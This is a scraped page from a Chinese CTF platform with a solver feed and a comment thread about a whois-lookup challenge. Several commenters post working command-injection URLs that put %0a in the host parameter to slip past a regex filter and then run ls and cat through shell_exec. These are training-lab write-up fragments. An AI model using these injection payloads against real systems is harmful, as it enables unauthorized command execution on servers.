评分(2)
解题动态
tianxiang2242 攻破了该题 2小时前
别给我画饼 攻破了该题 3小时前
long_1 攻破了该题 7小时前
pph 攻破了该题 23小时前
薇雨 攻破了该题 1天前
Linsudo 攻破了该题 1天前
谢勇强大王 攻破了该题 2天前
Q@vqi 攻破了该题 2天前
fml 攻破了该题 2天前
kitniu 攻破了该题 4天前
tytu 攻破了该题 4天前
GDGZ_CTF 攻破了该题 5天前
ksw0513 攻破了该题 6天前
晴空LMDK 攻破了该题 6天前
ysecer8 攻破了该题 7天前
谢润锃 攻破了该题 9天前
qsadxdefrewv 攻破了该题 9天前
广痣 攻破了该题 9天前
xxiaoma 攻破了该题 10天前
评论
KING12366 2月前
举报
Ai agent已经AK了 一把嗦 直接把网站给他就ak了 CTF没法玩了
ndzdb 24天前
举报
有git吗~大佬
another2001 4月前
举报
?host=ab%0a 这是因为在默认的情况下, 正则表达式$匹配的是可见字符的末尾
chenrujun 9月前
举报
BP抓包,绕过正则匹配过滤,host 和query 拼接成命令显示flag host=whois.verisign-grs.com%0a,%0a表示回车 query=ls查看当前目录文件 host=whois.verisign-grs.com%0a,%0a表示回车 query=cat 文件名
Kokomi-FIRE 12月前
举报
好像是利用参数拼接命令的玩意儿,得URL编码绕过
MoCaser 1年前
举报
不懂的建议花金币看看wp
000ooo 1年前
举报
①/query.php?host=whois.verisign-grs.com%0a&query=ls ②/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
zzz666 1年前
举报
@cyffk 空格和换行会被url编码
cyffk 1年前
举报
为什么%不会被过滤?
Zhumeng 1年前
举报
查看query源代码发现有个shell_exec()可以rce 通过%0a去截断第一个参数,然后在第二个参数里面输入ls可以查看当前目录文件 然后cat命令读取文件 空格需要url编码
admin9101 1年前
举报
http://82.157.146.43:16777/query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
MOCHAOLIN 1年前
举报
(1)http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=ls (2) http://82.157.146.43:13266/query.php?host=whois.verisign-grs.com%0A&query=cat%20thisistheflagwithrandomstuf
wj834722134 1年前
举报
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
网恋秀牛子被录屏导致自卑 4月前
举报
那个$可以匹配到字符串末尾或换行符
cfggfbfxdgbb 5月前
举报
换行了,换行符应该不在正则的匹配规则内
xwWx 1年前
举报
@TOMCAT336699 x0a 是换行的话大概是 正则表达式只匹配换行之前的字符串
TOMCAT336699 1年前
举报
您弄明白了没有,你这个问题,我没找出答案来,谢谢